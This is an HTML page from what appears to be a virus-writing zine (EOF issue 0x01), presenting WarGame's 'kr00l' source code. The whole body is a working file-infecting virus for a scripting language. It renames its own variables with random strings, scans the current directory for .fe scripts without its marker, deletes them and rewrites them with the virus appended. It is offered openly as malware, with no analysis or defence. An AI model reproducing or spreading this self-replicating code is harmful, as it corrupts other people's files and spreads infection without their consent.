<html><head><title>EOF ISSUE #0x01</title>
<style fprolloverstyle>A:hover {color: #D1F2C4; text-decoration: none}</style></head>
<body text="#E0E0E0" bgcolor="#131313" link="#BFBFBF" vlink="#BFBFBF" alink="#BFBFBF" style="font-size: 10pt">

<pre><hr>|| Author: WarGame/EOF || <a style="text-decoration: none" href="../mainmenu/sources.htm"><span style="text-decoration: none">Back to sources</span></a> || <a style="text-decoration: none" target="_blank" href="../binsrc/WarGame/Kr00lc"><span style="text-decoration: none; color: #BFBF88">View project folder</span></a> || <hr></pre>
<pre>
uses &quot;console&quot;;
Console.println(&quot;Hi !&quot;);
eval('uses &quot;filesystem&quot;,&quot;sys&quot;,&quot;regexp&quot;,&quot;math&quot;,&quot;string&quot;,&quot;date&quot;;function HCEE(string HJCB) { string st = File.open(HJCB).toString(); if(String.index(st,&quot;kr00l.c by [WarGame,#eof]&quot;) != -1) {return 1;} else {return 0;}} function AIEG(number sd) { Math.srand(sd); return String.sprintf(&quot;%c%c%c%c&quot;,((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65),((Math.rand()%10)+65));} string GABA = &quot;kr00l.c by [WarGame,#eof]&quot;;string HJCB = &quot;&quot;;string IHBG = &quot;&quot;;object pr =  File.open(Sys.scriptName());string CCCH = &quot;&quot;;object EGAE = new Directory(&quot;.&quot;); while(String.index((IHBG = pr.readln()),GABA) == -1) {} if(1) { IHBG = Regexp.replaceAll(&quot;GABA&quot;,IHBG,AIEG(Date.now()+1989)); IHBG = Regexp.replaceAll(&quot;CCCH&quot;,IHBG,AIEG(Date.now()+1992)); IHBG = Regexp.replaceAll(&quot;EGAE&quot;,IHBG,AIEG(Date.now()+1922)); IHBG = Regexp.replaceAll(&quot;HJCB&quot;,IHBG,AIEG(Date.now()+1981)); IHBG = Regexp.replaceAll(&quot;HCEE&quot;,IHBG,AIEG(Date.now()+1975)); IHBG = Regexp.replaceAll(&quot;AIEG&quot;,IHBG,AIEG(Date.now()+1960));  IHBG = Regexp.replaceAll(&quot;IHBG&quot;,IHBG,AIEG(Date.now()+2006));} while((HJCB = EGAE.getEntry()) != &quot;&quot;) { if(String.index(Sys.scriptName(),HJCB) == -1 &amp;&amp; String.index(HJCB,&quot;.fe&quot;) != -1) {  if(!HCEE(HJCB)) { CCCH = File.open(HJCB).toString(); File.remove(HJCB); File.create(HJCB).writeln(CCCH+IHBG); } } } ');
</pre></body></html>